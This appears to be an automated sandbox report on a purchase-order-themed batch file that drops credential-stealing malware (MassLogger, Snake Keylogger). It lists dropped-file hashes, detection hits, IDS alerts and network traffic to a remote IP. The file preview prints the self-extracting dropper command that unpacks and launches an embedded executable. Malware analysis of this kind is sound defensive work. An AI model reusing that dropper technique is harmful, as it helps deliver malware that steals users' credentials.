                                                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):104
                                                                                                                                            Entropy (8bit):5.149476016735825
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM1N6XL3vsbxlZQu:HRYFVmTWDyzKNafExlZQu
                                                                                                                                            MD5:BE3306A22DECEE7D299B1F6147BA99A4
                                                                                                                                            SHA1:3B8A878515BBE39FCF398DB9382C1DD56B5AB582
                                                                                                                                            SHA-256:8BFF29AFAC83F3F546A806EE577E999B8090556053D6D2C127300821EA5928EE
                                                                                                                                            SHA-512:8B9A84385D2999D20545162AA73A3EFBBA203FC1ADAE834B7E9D54BF6010B30C0EAF6B740564766DE62CB6F2E14ABC2BBCEAC6E7A2F17102B84CB25D0D88726C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF"..IconIndex=922199..HotKey=33..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                            File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15789
                                                                                                                                            Entropy (8bit):4.658965888116939
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                                            MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                                            SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                                            SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                                            SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                                                                                            Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):520
                                                                                                                                            Entropy (8bit):5.355496254154943
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                                                                                                                                            MD5:3C255C75EA6EB42410894C0D08A4E324
                                                                                                                                            SHA1:34B3512313867B269C545241CD502B960213293A
                                                                                                                                            SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                                                                                                                                            SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):5.380747059108785
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:lylWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxcIalLgZ2KRHWLOug8s
                                                                                                                                            MD5:8D9F4223D56DB7DB17A74A3253281700
                                                                                                                                            SHA1:1DDEAEDA99D8DBBD060FFD26D1928F3A9DA8C2B9
                                                                                                                                            SHA-256:C725BD02DDEAB391F1DB1D4562849ECED0FBD992DD757404F991F0ED7AB4A66B
                                                                                                                                            SHA-512:08F061B1B49B4FF1C5AF1C18AB00A9CAF32EE9054F42CD672B70AB9D549BC61815E358649F8C160813A48052F13B2EF12BD7B9B74BD39D850D3A027227C9D3C0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                            Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98816
                                                                                                                                            Entropy (8bit):5.666546286050177
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
                                                                                                                                            MD5:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                            SHA1:81BDE9535B07E103F89F6AEABDB873D7E35816C2
                                                                                                                                            SHA-256:DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
                                                                                                                                            SHA-512:AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...
                                                                                                                                            Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):70656
                                                                                                                                            Entropy (8bit):4.910353963160109
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                            MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                            SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                            SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                            SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1242624
                                                                                                                                            Entropy (8bit):7.0624316017893145
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:PP+c4OuuuRyxjoSJmjtHXyzvWZS2kCxG2JRxVuYbdxiHA:PmJjW4ZHXyB2kX2Jv/bdx
                                                                                                                                            MD5:EE363121466EE051042410AFFFEA28EF
                                                                                                                                            SHA1:F528897FD071AF01778FB37BC3D6E320012176A8
                                                                                                                                            SHA-256:CD73EEBF2B36EB1BC4DFD5C4D5337AE41E5C49346523CB03202F116DFC838533
                                                                                                                                            SHA-512:5DC645388DE2F6B17207F78BACED71947874B7813C6DAE129F00AB6FC965DB956ABE8025E706F4A68153FEFFC49EDF2459320846C1D508D733C14B6E4A4BA77B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@...............................(...p..................................................................................L............................text...@........................... ..`.itext.............................. ..`.data....)... ...*..................@....bss.....8...P...........................idata...(.......*..................@....tls....4............X...................rdata...............X..............@..@.reloc...............Z..............@..B.rsrc........p......................@..@....................................@..@................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):665670656
                                                                                                                                            Entropy (8bit):7.9999993950214465
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:1EC1BD626F8EA04635D66113E34C4733
                                                                                                                                            SHA1:226FEE707F17B418BCBE1720B300BF2A2C6FFE4E
                                                                                                                                            SHA-256:DF8826EF3E673F77D3A93A81A20EAC2955535BC103814B79B7C9C01251E30A17
                                                                                                                                            SHA-512:59C060C92D79598F04A48B1CAB4ED0677116DCC2FBE26AA641694DBB22BCAE3BA3069C9CF31DE5F8718629ECCB513730CD246F45274A0AABE151AF453D17BB30
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1820
                                                                                                                                            Entropy (8bit):2.4170562931013335
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:8PsXU1e/tz0/CSL4WWeMNDyWlT9KBQ17+AUvO4Zv7L1Q17+ANCNfBf4t2YZ/elFR:80vWLqeMNmG9KmR+O4ZvPqRMjqy
                                                                                                                                            MD5:6F855ED56D27EB1076AF8E6BCB1CF43D
                                                                                                                                            SHA1:F051846AF399F2FC3A9A4DB8FCCF3E608B0614F7
                                                                                                                                            SHA-256:463C757C60408A5879898FFC4E201BFBE6087ED567E7DAED1B5C454AFBDD62BA
                                                                                                                                            SHA-512:6EC6DCB51FF117F2FEB40E358AB7D493792046783D5CF30384D8EF18AE1D8332F31FFFA5D05F3C52A2564A943E087A41A119AACAF0FFB39F5BB8FFB0AE707F8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.@......................................................5....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.4.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe...............................................................................................................
                                                                                                                                            File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 38 datablocks, 0 compression
                                                                                                                                            Entropy (8bit):7.06197212646245
                                                                                                                                            TrID:
                                                                                                                                            • Microsoft Cabinet Archive (8008/1) 99.91%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                                                                            File name:PO#5_Tower_049.bat
                                                                                                                                            File size:1'243'067 bytes
                                                                                                                                            MD5:0d8e4971994af9eae92707005997ad14
                                                                                                                                            SHA1:3473ecb4f88d6ceb8ab7e085bbd7f7a2bc199aea
                                                                                                                                            SHA256:6c76b0654fd88351436c641c0c81abb399a8f37702e9f8375d71283a75274f6b
                                                                                                                                            SHA512:bcc633c193f0fa7061d85711a9cbe18878ef5b37b887da6755c2ef1eb0a99354b4e6a892a5535b4e4c82e1ac9ea9e1914c3f42a6ffb02b45a756a2aa21645b07
                                                                                                                                            SSDEEP:24576:DPqcoOuSSRyxPUSJyvZnXizzylSGoChSiJdxVucbddiHg:DS5bGExnXilGojiJLzbdd
                                                                                                                                            TLSH:37459CD3F2900477E0F70D754D0B5A9A7B33BE312E64A4563BE82B48CF39A912927356
                                                                                                                                            File Content Preview:MSCF............u.......................&.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und
                                                                                                                                            Icon Hash:9686878b929a9886
                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2025-01-03T20:39:58.523792+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970541.185.8.252443TCP
                                                                                                                                            2025-01-03T20:40:15.972518+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549706158.101.44.24280TCP
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Jan 3, 2025 20:39:57.440507889 CET49704443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:57.440550089 CET4434970441.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:57.440635920 CET49704443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:57.442800999 CET49704443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:57.442852020 CET4434970441.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:57.443000078 CET49704443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:57.489146948 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:57.489181995 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:57.489240885 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:57.490756035 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:57.490772009 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:58.523726940 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:58.523792028 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:58.527564049 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:58.527575016 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:58.527843952 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:58.571647882 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:58.619337082 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.093470097 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.093497038 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.093507051 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.093538046 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.093554020 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.093569994 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.093583107 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.093592882 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.093592882 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.093616962 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.093638897 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.278887033 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.278908968 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.278975010 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.278989077 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.279088020 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.487822056 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.487843037 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.487987995 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.488002062 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.488168001 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.489377022 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.489392042 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.489540100 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.489547968 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.491125107 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.491144896 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.491213083 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.491213083 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.491221905 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.493577003 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.535011053 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.535029888 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.535121918 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.535121918 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.535130024 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.535191059 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.714962959 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.714979887 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.715073109 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.715095043 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.715110064 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.715217113 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.715734959 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.715749979 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.715841055 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.715841055 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.715848923 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.715914965 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.716497898 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.716522932 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.716598034 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.716598034 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.716603994 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.716886044 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.717493057 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.717508078 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.717582941 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.717588902 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.717617035 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.717727900 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.719933033 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.719948053 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.720040083 CET49705443192.168.2.541.185.8.252
